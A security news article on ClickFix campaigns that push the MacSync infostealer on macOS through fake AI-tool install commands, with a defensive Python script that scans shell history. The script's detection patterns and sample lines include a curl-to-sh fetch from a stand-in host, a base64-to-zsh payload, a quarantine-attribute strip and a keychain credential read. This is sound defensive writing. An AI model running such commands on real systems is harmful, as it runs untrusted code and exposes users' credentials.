Protect.Computer
NEWS

ClickFix campaigns push MacSync infostealer via fake AI tool installers

Categories: Device safety, Digital scams

What happened

Researchers report active ClickFix campaigns that impersonate legitimate AI and developer tooling pages, then trick victims into copying and running terminal commands on macOS. Instead of installing a real tool, the command chain installs the MacSync infostealer.

Campaigns observed since late 2025 continue to evolve, with newer variants adding stronger evasion behavior and broader data theft capability.

What can be stolen

Data targeted by MacSync can include:

  • browser credentials and session artifacts,
  • macOS keychain data,
  • SSH/cloud credentials,
  • crypto wallet material and seed phrases,
  • sensitive local files and notes.

Because the infection path is a terminal command the victim runs themselves, it sidesteps the caution many users apply to downloading and opening an unknown app. It also sidesteps the platform checks that rely on that workflow: a script fetched with curl and piped straight into a shell is never written to disk with the quarantine attribute, so Gatekeeper has nothing to inspect.

Why this matters

ClickFix-style attacks are scaling because they abuse a workflow many technical users already trust (copy/paste install commands). That makes this tactic effective against developers, creators, and power users who often hold high-value credentials.

What to do now

  1. Treat any “copy this terminal command” prompt from ads, cloned pages, or social links as suspicious.
  2. Restrict or monitor shell command execution that follows untrusted instructions, especially pipelines of the form curl ... | sh or curl ... | zsh that run a downloaded script without writing it to disk or inspecting it first.
  3. Use endpoint controls that alert when a shell spawned from Terminal makes outbound network connections and then reads the keychain, browser credential stores, or SSH and cloud configuration files.
  4. Rotate credentials immediately if a device may have executed unknown install commands: browser sessions, SSH keys, cloud tokens, and any wallet material, and treat keychain contents as exposed.
  5. Add user awareness examples for ClickFix/InstallFix lures to security training.
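One concrete way to act on steps 2 and 3 is to scan shell history or a command-line audit feed for the patterns ClickFix lures rely on. The script below is an added example written for this article, not code from the original page, from the researchers who reported the campaign, or from any vendor. The indicator names and regular expressions are this example's own choices rather than a published MacSync signature, and the sample history lines (including the example.invalid URL) are constructed.

```python
# Added example: scan shell history for ClickFix-style command patterns.
# Indicator names and regexes are this example's own; sample lines are constructed.
import os
import re
from dataclasses import dataclass

INDICATORS = [
    # A download piped straight into an interpreter: curl ... | sh / bash / zsh.
    ("download_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&\n]*\|\s*(sudo\s+)?(sh|bash|zsh)\b")),
    # A base64-decoded payload executed in place without touching disk.
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|\n]*\|\s*(sudo\s+)?(sh|bash|zsh|python3?)\b")),
    # eval of a body fetched inside a command substitution.
    ("eval_of_fetched_content",
     re.compile(r"\beval\b.*\$\((curl|wget)\b")),
    # Quarantine attribute stripped so Gatekeeper will not inspect a download.
    ("quarantine_removed",
     re.compile(r"\bxattr\s+-(?:d|r|rd|dr)\s+com\.apple\.quarantine\b|\bxattr\s+-c\b")),
    # Keychain items read from a shell one-liner (browser encryption keys live here).
    ("keychain_access",
     re.compile(r"\bsecurity\s+(find-generic-password|find-internet-password|dump-keychain)\b")),
]

# zsh extended history prefixes each command with ": <epoch>:<elapsed>;".
ZSH_EXT = re.compile(r"^: \d+:\d+;")


@dataclass
class Finding:
    line_no: int
    indicator: str
    command: str


def scan_history(lines):
    """Return a Finding for every history line that matches at least one indicator."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for name, rx in INDICATORS:
            if rx.search(line):
                findings.append(Finding(n, name, line.strip()))
    return findings


def load_history(path):
    """Read a zsh or bash history file, dropping zsh extended-history timestamps."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [ZSH_EXT.sub("", raw).rstrip("\n") for raw in fh]


# Constructed sample history: benign lines mixed with ClickFix-style lines.
SAMPLE_HISTORY = [
    "git pull --rebase",
    "brew install ffmpeg",
    "curl -fsSL https://example.invalid/ai-tool/install.sh | sh",  # constructed URL
    "echo aGVsbG8= | base64 -d | zsh",
    "xattr -d com.apple.quarantine ~/Downloads/AITool.app",
    "security find-generic-password -ga 'Chrome Safe Storage'",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"sample line {f.line_no}: {f.indicator}: {f.command}")
    # Optionally scan the current user's real zsh history if it exists.
    real = os.path.expanduser("~/.zsh_history")
    if os.path.exists(real):
        for f in scan_history(load_history(real)):
            print(f"~/.zsh_history line {f.line_no}: {f.indicator}: {f.command}")
```

Run it as-is to see the four constructed hits; point load_history at a collected history file or at exported command-line telemetry to triage a fleet. A hit on download_piped_to_shell or quarantine_removed on a developer machine is a reasonable trigger for step 4, rotating credentials, rather than something to wait on.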

Bottom line

This is a social-engineering-first malware delivery model, not a one-off campaign. Defenses need to focus on user-driven command execution risk as much as traditional exploit prevention.
